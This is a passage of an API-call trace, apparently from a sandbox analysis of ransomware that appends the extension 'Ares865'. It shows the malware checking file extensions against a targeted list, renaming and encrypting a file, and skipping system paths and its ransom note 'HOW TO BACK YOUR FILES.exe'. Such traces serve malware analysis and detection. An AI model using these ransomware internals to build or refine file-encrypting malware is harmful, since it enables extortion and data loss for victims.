(lpString1="ini", lpString2="adb") returned 1 [0050.111] lstrlenW (lpString="ade") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0050.111] lstrlenW (lpString="adf") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0050.111] lstrlenW (lpString="adn") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0050.111] lstrlenW (lpString="adp") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0050.111] lstrlenW (lpString="alf") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0050.111] lstrlenW (lpString="ask") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0050.111] lstrlenW (lpString="btr") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0050.111] lstrlenW (lpString="cat") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0050.111] lstrlenW (lpString="cdb") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0050.111] lstrlenW (lpString="ckp") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0050.111] lstrlenW (lpString="cma") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0050.111] lstrlenW (lpString="cpd") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0050.111] lstrlenW (lpString="dacpac") returned 6 [0050.111] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0050.111] lstrlenW (lpString="dad") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0050.111] lstrlenW (lpString="dadiagrams") returned 10 [0050.112] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0050.112] lstrlenW (lpString="daschema") returned 8 [0050.112] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0050.112] lstrlenW (lpString="db-journal") returned 10 [0050.112] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0050.112] lstrlenW (lpString="db-shm") returned 6 [0050.112] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0050.112] lstrlenW (lpString="db-wal") returned 6 [0050.112] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0050.112] lstrlenW (lpString="dbc") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0050.112] lstrlenW (lpString="dbs") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0050.112] lstrlenW (lpString="dbt") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0050.112] lstrlenW (lpString="dbv") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0050.112] lstrlenW (lpString="dbx") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0050.112] lstrlenW (lpString="dcb") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0050.112] lstrlenW (lpString="dct") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0050.112] lstrlenW (lpString="dcx") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0050.112] lstrlenW (lpString="ddl") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0050.112] lstrlenW (lpString="dlis") returned 4 [0050.112] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0050.112] lstrlenW (lpString="dp1") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0050.112] lstrlenW (lpString="dqy") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0050.112] lstrlenW (lpString="dsk") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0050.112] lstrlenW (lpString="dsn") returned 3 [0050.112] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0050.112] lstrlenW (lpString="dtsx") returned 4 [0050.113] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0050.113] lstrlenW (lpString="dxl") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0050.113] lstrlenW (lpString="eco") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0050.113] lstrlenW (lpString="ecx") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0050.113] lstrlenW (lpString="edb") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0050.113] lstrlenW (lpString="epim") returned 4 [0050.113] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0050.113] lstrlenW (lpString="fcd") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0050.113] lstrlenW (lpString="fdb") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0050.113] lstrlenW (lpString="fic") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0050.113] lstrlenW (lpString="flexolibrary") returned 12 [0050.113] lstrlenW (lpString="fm5") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0050.113] lstrlenW (lpString="fmp") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0050.113] lstrlenW (lpString="fmp12") returned 5 [0050.113] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0050.113] lstrlenW (lpString="fmpsl") returned 5 [0050.113] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0050.113] lstrlenW (lpString="fol") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0050.113] lstrlenW (lpString="fp3") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0050.113] lstrlenW (lpString="fp4") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0050.113] lstrlenW (lpString="fp5") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0050.113] lstrlenW (lpString="fp7") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0050.113] lstrlenW (lpString="fpt") returned 3 [0050.113] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0050.113] lstrlenW (lpString="frm") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0050.114] lstrlenW (lpString="gdb") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0050.114] lstrlenW (lpString="gdb") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0050.114] lstrlenW (lpString="grdb") returned 4 [0050.114] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0050.114] lstrlenW (lpString="gwi") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0050.114] lstrlenW (lpString="hdb") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0050.114] lstrlenW (lpString="his") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0050.114] lstrlenW (lpString="ib") returned 2 [0050.114] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0050.114] lstrlenW (lpString="idb") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0050.114] lstrlenW (lpString="ihx") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0050.114] lstrlenW (lpString="itdb") returned 4 [0050.114] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0050.114] lstrlenW (lpString="itw") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0050.114] lstrlenW (lpString="jet") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0050.114] lstrlenW (lpString="jtx") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0050.114] lstrlenW (lpString="kdb") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0050.114] lstrlenW (lpString="kexi") returned 4 [0050.114] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0050.114] lstrlenW (lpString="kexic") returned 5 [0050.114] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0050.114] lstrlenW (lpString="kexis") returned 5 [0050.114] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0050.114] lstrlenW (lpString="lgc") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0050.114] lstrlenW (lpString="lwx") returned 3 [0050.114] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0050.115] lstrlenW (lpString="maf") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0050.115] lstrlenW (lpString="maq") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0050.115] lstrlenW (lpString="mar") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0050.115] lstrlenW (lpString="marshal") returned 7 [0050.115] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0050.115] lstrlenW (lpString="mas") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0050.115] lstrlenW (lpString="mav") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0050.115] lstrlenW (lpString="maw") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0050.115] lstrlenW (lpString="mdbhtml") returned 7 [0050.115] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0050.115] lstrlenW (lpString="mdn") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0050.115] lstrlenW (lpString="mdt") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0050.115] lstrlenW (lpString="mfd") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0050.115] lstrlenW (lpString="mpd") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0050.115] lstrlenW (lpString="mrg") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0050.115] lstrlenW (lpString="mud") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0050.115] lstrlenW (lpString="mwb") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0050.115] lstrlenW (lpString="myd") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0050.115] lstrlenW (lpString="ndf") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0050.115] lstrlenW (lpString="nnt") returned 3 [0050.115] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0050.115] lstrlenW (lpString="nrmlib") returned 6 [0050.115] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0050.116] lstrlenW (lpString="ns2") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0050.116] lstrlenW (lpString="ns3") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0050.116] lstrlenW (lpString="ns4") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0050.116] lstrlenW (lpString="nsf") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0050.116] lstrlenW (lpString="nv") returned 2 [0050.116] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0050.116] lstrlenW (lpString="nv2") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0050.116] lstrlenW (lpString="nwdb") returned 4 [0050.116] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0050.116] lstrlenW (lpString="nyf") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0050.116] lstrlenW (lpString="odb") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0050.116] lstrlenW (lpString="odb") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0050.116] lstrlenW (lpString="oqy") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0050.116] lstrlenW (lpString="ora") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0050.116] lstrlenW (lpString="orx") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0050.116] lstrlenW (lpString="owc") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0050.116] lstrlenW (lpString="p96") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0050.116] lstrlenW (lpString="p97") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0050.116] lstrlenW (lpString="pan") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0050.116] lstrlenW (lpString="pdb") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0050.116] lstrlenW (lpString="pdm") returned 3 [0050.116] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0050.116] lstrlenW (lpString="pnz") returned 3 [0050.117] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0050.117] lstrlenW (lpString="qry") returned 3 [0050.117] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0050.117] lstrlenW (lpString="qvd") returned 3 [0050.117] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0050.164] lstrlenW (lpString="rbf") returned 3 [0050.164] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0050.164] lstrlenW (lpString="rctd") returned 4 [0050.164] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0050.164] lstrlenW (lpString="rod") returned 3 [0050.164] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0050.165] lstrlenW (lpString="rodx") returned 4 [0050.165] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0050.165] lstrlenW (lpString="rpd") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0050.165] lstrlenW (lpString="rsd") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0050.165] lstrlenW (lpString="sas7bdat") returned 8 [0050.165] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0050.165] lstrlenW (lpString="sbf") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0050.165] lstrlenW (lpString="scx") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0050.165] lstrlenW (lpString="sdb") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0050.165] lstrlenW (lpString="sdc") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0050.165] lstrlenW (lpString="sdf") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0050.165] lstrlenW (lpString="sis") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0050.165] lstrlenW (lpString="spq") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0050.165] lstrlenW (lpString="te") returned 2 [0050.165] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0050.165] lstrlenW (lpString="teacher") returned 7 [0050.165] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0050.165] lstrlenW (lpString="tmd") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0050.165] lstrlenW (lpString="tps") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0050.165] lstrlenW (lpString="trc") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0050.165] lstrlenW (lpString="trc") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0050.165] lstrlenW (lpString="trm") returned 3 [0050.165] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0050.165] lstrlenW (lpString="udb") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0050.166] lstrlenW (lpString="udl") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0050.166] lstrlenW (lpString="usr") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0050.166] lstrlenW (lpString="v12") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0050.166] lstrlenW (lpString="vis") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0050.166] lstrlenW (lpString="vpd") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0050.166] lstrlenW (lpString="vvv") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0050.166] lstrlenW (lpString="wdb") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0050.166] lstrlenW (lpString="wmdb") returned 4 [0050.166] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0050.166] lstrlenW (lpString="wrk") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0050.166] lstrlenW (lpString="xdb") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0050.166] lstrlenW (lpString="xld") returned 3 [0050.166] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0050.166] lstrlenW (lpString="xmlff") returned 5 [0050.166] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0050.166] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.Ares865") returned 54 [0050.166] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0050.203] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0050.203] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=586) returned 1 [0050.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0050.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6040 [0050.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0050.204] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0050.204] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0050.204] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0050.205] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x168 [0050.243] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0050.290] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0050.291] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0050.291] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0050.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb470 [0050.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb470 | out: hHeap=0x2b0000) returned 1 [0050.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2710 [0050.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3210e0 [0050.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0050.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3211f8 [0050.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbf30 [0050.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3211f8 | out: hHeap=0x2b0000) returned 1 [0050.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbf30 | out: hHeap=0x2b0000) returned 1 [0050.291] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3210e0 | out: hHeap=0x2b0000) returned 1 [0050.291] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0050.291] CloseHandle (hObject=0x168) returned 1 [0050.291] CloseHandle (hObject=0x12c) returned 1 [0050.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6040 | out: hHeap=0x2b0000) returned 1 [0050.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0050.293] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0050.293] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497a4c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0050.293] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0050.293] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="aoldtz.exe") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="..") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="windows") returned -1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="bootmgr") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="temp") returned -1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="pagefile.sys") returned -1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="boot") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ids.txt") returned 1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ntuser.dat") returned -1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="perflogs") returned -1 [0050.293] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="MSBuild") returned -1 [0050.294] lstrlenW (lpString="Kalimba.mp3") returned 11 [0050.294] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 46 [0050.294] lstrcpyW (in: lpString1=0x2cce446, lpString2="Kalimba.mp3" | out: lpString1="Kalimba.mp3") returned="Kalimba.mp3" [0050.294] lstrlenW (lpString="Kalimba.mp3") returned 11 [0050.294] lstrlenW (lpString="Ares865") returned 7 [0050.294] lstrcmpiW (lpString1="mba.mp3", lpString2="Ares865") returned 1 [0050.294] lstrlenW (lpString=".dll") returned 4 [0050.294] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".dll") returned 1 [0050.294] lstrlenW (lpString=".lnk") returned 4 [0050.294] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".lnk") returned 1 [0050.294] lstrlenW (lpString=".ini") returned 4 [0050.294] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".ini") returned 1 [0050.294] lstrlenW (lpString=".sys") returned 4 [0050.294] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".sys") returned 1 [0050.294] lstrlenW (lpString="Kalimba.mp3") returned 11 [0050.294] lstrlenW (lpString="bak") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="bak") returned 1 [0050.294] lstrlenW (lpString="ba_") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="ba_") returned 1 [0050.294] lstrlenW (lpString="dbb") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="dbb") returned 1 [0050.294] lstrlenW (lpString="vmdk") returned 4 [0050.294] lstrcmpiW (lpString1=".mp3", lpString2="vmdk") returned -1 [0050.294] lstrlenW (lpString="rar") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="rar") returned -1 [0050.294] lstrlenW (lpString="zip") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="zip") returned -1 [0050.294] lstrlenW (lpString="tgz") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="tgz") returned -1 [0050.294] lstrlenW (lpString="vbox") returned 4 [0050.294] lstrcmpiW (lpString1=".mp3", lpString2="vbox") returned -1 [0050.294] lstrlenW (lpString="vdi") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="vdi") returned -1 [0050.294] lstrlenW (lpString="vhd") returned 3 [0050.294] lstrcmpiW (lpString1="mp3", lpString2="vhd") returned -1 [0050.294] lstrlenW (lpString="vhdx") returned 4 [0050.294] lstrcmpiW (lpString1=".mp3", lpString2="vhdx") returned -1 [0050.295] lstrlenW (lpString="avhd") returned 4 [0050.295] lstrcmpiW (lpString1=".mp3", lpString2="avhd") returned -1 [0050.295] lstrlenW (lpString="db") returned 2 [0050.295] lstrcmpiW (lpString1="p3", lpString2="db") returned 1 [0050.295] lstrlenW (lpString="db2") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="db2") returned 1 [0050.295] lstrlenW (lpString="db3") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="db3") returned 1 [0050.295] lstrlenW (lpString="dbf") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="dbf") returned 1 [0050.295] lstrlenW (lpString="mdf") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="mdf") returned 1 [0050.295] lstrlenW (lpString="mdb") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="mdb") returned 1 [0050.295] lstrlenW (lpString="sql") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="sql") returned -1 [0050.295] lstrlenW (lpString="sqlite") returned 6 [0050.295] lstrcmpiW (lpString1="ba.mp3", lpString2="sqlite") returned -1 [0050.295] lstrlenW (lpString="sqlite3") returned 7 [0050.295] lstrcmpiW (lpString1="mba.mp3", lpString2="sqlite3") returned -1 [0050.295] lstrlenW (lpString="sqlitedb") returned 8 [0050.295] lstrcmpiW (lpString1="imba.mp3", lpString2="sqlitedb") returned -1 [0050.295] lstrlenW (lpString="xml") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="xml") returned -1 [0050.295] lstrlenW (lpString="$er") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="$er") returned 1 [0050.295] lstrlenW 